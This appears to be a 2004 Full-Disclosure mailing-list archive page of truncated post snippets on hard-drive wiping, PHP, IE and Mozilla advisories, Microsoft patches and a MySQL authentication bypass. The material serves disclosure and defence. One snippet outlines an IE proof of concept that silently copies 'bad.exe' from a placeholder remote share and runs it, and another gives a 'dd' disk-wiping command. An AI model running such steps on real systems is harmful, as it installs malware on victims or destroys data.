>
> I'm guessing that drilling a hole in the case, pouring in some sand and firing up
> the disk would probably do a good job of rendering the data non-readable too ;>
since the original poster only wanted to clean up the harddisk for donations so that
no one can read the disks I think the Lin
man you had my hopes up until i noticed it wasn't the
PHC version. :(
--- Richard Miller <[EMAIL PROTECTED]> wrote:
> Hi,
>
> Tue Jul 13 00:58:42 UTC - PHRACK #62 HAS BEEN
> RELEASED.
>
> *** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG
>
> *** NOW AVAILABLE AT HTTP://WWW.PHRACK.O
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
e-matters GmbH
www.e-matters.de
-= Security Advisory =-
Advisory: PHP memory_limit remote vulnerability
Release Date: 2004/07/14
Last Modified: 2004/07/14
Auth
On Tuesday 13 July 2004 19:16, Kain, Becki \(B.\) wrote:
> Personally, I've used Eraser with the one pass option and tested it against
> Encase and couldn't retrieve anything. It's free, it's quick, and I'd
> highly recommend it.
Well, however impressive Encase might look (I didn't know it) I thi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
e-matters GmbH
www.e-matters.de
-= Security Advisory =-
Advisory: PHP strip_tags() bypass vulnerability
Release Date: 2004/07/14
Last Modified: 2004/07/14
Auth
On Tue, 13 Jul 2004, BillyBob wrote:
> From: BillyBob <[EMAIL PROTECTED]>
Hello Mr. Knob,
> Subject: [Full-Disclosure] SNMPBroadcasts
SNMP doesn't "broadcast"
> For the past 12 hours my external IP has been bombarded with SNMP
"Bombarded"? Below you state it was only "several per second".
Count your blessings, that's blazingly fast for Microsoft
This one is over 7 months old, today they finally patched it
http://packetstormsecurity.org.pk/0312-advisories/ie_showHelp.txt
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Aaron Horst
Sent: d
Will I be able to stop it from auto-downloading
the patches by default?
After the auto-downlaod I hope I can
stop, will I be able to to stop the auto-install (in case I can't stop
the auto-download, of course)?
You see, I am worried about the auto-install
following the auto-download auto-breakin
Days of mindnumbing research revealed:
http://www.microsoft.com/technet/security/bulletin/ms04-023.mspx
Vulnerability in HTML Help Could Allow Code Execution
(840315)
A security issue has been identified that could allow
an attacker, with some user interaction, to run
applications on a system. Yo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Would you concider donating them to http://www.freetradecampus.com where we
would format and load linux on them to give away to needy students?
On Monday 12 July 2004 02:49 pm, amilabs wrote:
> I have a bunch of old computers I would like to donate.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Michael, you claim that this is a typo, but is it really? Even if this
is a typo, how do you explain waiting over a month to contact the vendor?
How do you explain past times when iDefense waited over a year to notify
a vendor? How does this relate t
Yet another 6 month old exploit, just fixed!
http://www.securityfocus.com/archive/1/351379
Gotta love the fast Microsoft responses.
AnthraX101
On Tue, 13 Jul 2004 15:02:37 -0400, Matt Ostiguy <[EMAIL PROTECTED]> wrote:
> http://www.microsoft.com/technet/security/bulletin/MS04-024.mspx
>
> ___
http://www.microsoft.com/technet/security/bulletin/MS04-024.mspx
On Tue, 13 Jul 2004 18:05:31 +0100, Randal, Phil
<[EMAIL PROTECTED]> wrote:
> From the install log on an XP box:
>
> Copied file: C:\WINDOWS\System32\fldrclnr.dll
> Copied file: C:\WINDOWS\System32\shell32.dll
> Copied file: C:\W
[see:http://www.securityfocus.com/archive/1/368671]
this just opens up a whole big can of worms. Phried Phish Phor
everyone.
http://www.malware.com/pauls.html
https is even phunner.
phew.
--
http://www.malware.com
___
Full-Disclosure - W
Yes, firewall is enabled by default.
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx
Auto-download and auto-installation are enabled by default, too.
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2maint.mspx
Regards
Marco Ellmann
> -Ursprüngl
What computer person doesn't know a few friends that are gun owners?
I know we're always looking for new targets, box up the drives and
bring them to the Defcon shoot. :)
http://www.23.org/~chs/gallery/defconx/shoot/pict2205f.jpeg
Cheers!
William Knowles
[EMAIL PROTECTED]
> From: amilabs [ma
Ok my favorite method is drilling a hole and adding sand. If it is fine enough it
could even work like a rock polisher. :-)
Michael R. Schmidt
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Jos Osborne
Sent: Tuesday, July 13, 2004 8:45 AM
To: [EMAIL PROTE
We are proud to announce the release of our latest white paper
titled 0x00 vs ASP file upload scripts.
.Abstract.
The affects of the `Poison NULL byte` have not been widely
explored in ASP, but as with other languages the NULL byte
can cause problems when ASP passes data to objects.
Many upload s
We already know the firewall will be enabled by default.
Will auto download patches be default?
After auto download, will Windows XP auto install the patch by default?
I hope so.
Cheerio
___
Full-Disclosure - We believe in it.
Charter: http://lists.
Aviv Raff wrote:
> If an attacker has a file writing access to the user's default profile
> directory, or somehow manages to update/create the file user.js (or
> even worse - mozilla.cfg) he can override the patch's configuration
> change, and enable the shell protocol handler again.
Nobody shoul
-Original Message-
From: Eric Schultze [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 13, 2004 12:25 PM
To: Patch Management Mailing List
Subject: New Microsoft Security Bulletins and patches released
7 new bulletins, at least one of which is Critical
approximately 22 individual patche
Personally, I've used Eraser with the one pass option and tested it against Encase and
couldn't retrieve anything. It's free, it's quick, and I'd highly recommend it.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of amilabs
Sent: Tuesday, July 13, 2004 10:51
On Mon, July 12, 2004 9:25 pm, Sapheriel said:
> what baffles me is how easily this problem could be countered. a simple
> check of bfsize versus filesize(-header and such) would suffice.
Most vulnerabilities can be countered with something very simple like a
size check, yet developers don't do it
Hi,
Tue Jul 13 00:58:42 UTC - PHRACK #62 HAS BEEN RELEASED.
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG
*** NOW AVAILABLE AT HTTP://WWW.PHRACK.ORG
PHRACK MAGAZINE is one of the longest running electronic magazine
>That's what I am going to do to the non donated units smash, drill and M80
>them.
>But for the ones I am donating I was wondering if the magnet approach was
>quick enough.
>
>Thanks..
>
>Marek
Any magnetic field strong enough to wipe the data will nerf the addressing tables on
the disks, le
Hello,
I believe you are referring to "scrubing" the drive. The problem is as
follows. Let's say you use the standard windows format utility that only
removes the FAT table. While all the data is still on the hard drive. Only
the "location" as to where it is kept is removed. So you just really ove
We actually used a hard drive shredder for defective drives that could not
be erased easily. That thing went through 200 drives in about 10 minutes.
Pretty cool to watch, think "wood chipper for hard drives" :)
-Original Message-
From: amilabs [mailto:[EMAIL PROTECTED]
Sent: Monday,
>From the install log on an XP box:
Copied file: C:\WINDOWS\System32\fldrclnr.dll
Copied file: C:\WINDOWS\System32\shell32.dll
Copied file: C:\WINDOWS\System32\shlwapi.dll
Copied file: C:\WINDOWS\System32\sxs.dll
Copied file: C:\WINDOWS\System32\DllCache\shlwapi.dll
Copied file: C:\WINDOWS\S
Much of the posting on this topic probably is overkill.
If you are a private business, and the files on the hard drives are not top
secret super-sensitive defense information, but are the usual (referring to the
Laptops) salesman, outside representative type of use,) then a delete of the
hard dri
On Tuesday 13 July 2004 16:26, Denis McMahon wrote:
> I have a program that I wrote to do a mass overwrite, it does walking
> bit, walking null, alternating and reversed bit patterns, all 0s, all
> 1's and several other things, but I wouldn't trust it to erase any data
> that serious people with l
I'm Amazed !!
the program itself is lame, and the programer doesnt know how to code from the
programs output !!
nice
-
[EMAIL PROTECTED] root gcc -o lameness bUgSc4n.c
[EMAIL PROTECTED] root $ ./tmp bUgSc4n.c
you used strcpy in your code fucking lame!
you used strcat in your cod
If you are trying to stop groups like the NSA from reading the disk, only
melting it down would be enough.
If, on the other hand, you just want to make sure the data is not readable
from casual users to mid range geeks, boot a bootable linux cdrom, run "dd
if=/dev/zero of=/dev/hda". If your paran
On Tue, 13 Jul 2004, Aditya, ALD [ Aditya Lalit Deshmukh ] wrote:
> is the addition of /dev/full sufficent ie /dev/zero alternated by
> /dev/full should do the trick ? ie write zeros and ones on the disk,
/dev/full is full of zeroes...like /dev/zero (opened for reading)
--Pavel Kankovsky aka Pea
Hello;
Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
Jelmer) message. I just added a new feature "download" and then execute
application. Also I use Wscript.Shell in Javascript instead of
Shell.Application.
1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
2- Wait f
I know you stated "allegedly" but this subject interests me.
It used to interest me professionally, and I still have an interest in it.
If I wanted to be absolutely 100% sure that my data was not going to be
recovered, I'd dismantle the disc and remove the recording media from
the platters using
That's what I am going to do to the non donated units smash, drill and M80
them.
But for the ones I am donating I was wondering if the magnet approach was
quick enough.
Thanks..
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Marek Isalski
Sent: Tues
heh, apparently they dont hold themselves up to their
own standards. Just joking, just shows the weakness
of these scanners. Atleast ITS4 knows when its
scanning itself and turn off all those warnings.
-vx
[EMAIL PROTECTED] vxdude]$ gcc bugscan.c -o
bugscan
[EMAIL PROTECTED] vxdude]$ ./bugscan
For the past 12 hours my external IP has been bombarded with SNMP
Broadcasts, I have sent complaints to my ISP and the ISP of the originating
IP.
The attacking IP must have some sort of worm or automated script to go
through all the port numbers as his remote port starts at 60001 and goes up
to 640
>>> Javier Liendo <[EMAIL PROTECTED]> 13/07/2004 04:59:16 >>>
> i've read that physically removing the disk plates
> from a modern hard disk is more than enough to make
> the information contained there imposible to read.
Our standard procedure for destruction of hard disks is summed up in two wor
does not like grep?
-H
-Original Message-
From: virgil [mailto:[EMAIL PROTECTED]
Sent: Lunes, 12 de Julio de 2004 19:03
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] A BLACKHAT PROGRAM TO AUDIT YOUR CODE
W3 (FR h1gH c0uNc1l bl4ckh4t 3l33t p3op13) h4v3 d3c1d3D t0 g1v3 y0u a r34l
pr00f
>However i have been informed that equipment exists to retrieve data that programs on
>a normal >system cannot. Hence the writing multiple times with all 0 then all 1 then
>all 0 will cycle >>the disk so that it is virtually impossible to determine the
>residual data (please note all >1 means
Aviv Raff wrote:
How can it not be a security flaw of mozilla if a setting in the
user.js overrides the global security setting defined by a patch, and
any manual setting defined by the user through the about:config?
I understand that if an attacker has the ability to change the user.js
file he can
it seems to just be loading a bunch of data ( 1851MB ) via images
to consume memory.
the same effect can be accomplished here...
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- snip --
Such memory protection systems aren
MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client
autor: RusH security team, http://rst.void.ru
Usage:
F:\>mysql -uroot -pr57
Welcome to the MySQL monitor.
>>Little cool edit by RusH security team =) http://rst.void.ru
Commands end with ; or \g.
Your MySQL connection id is 2
44 matches
Mail list logo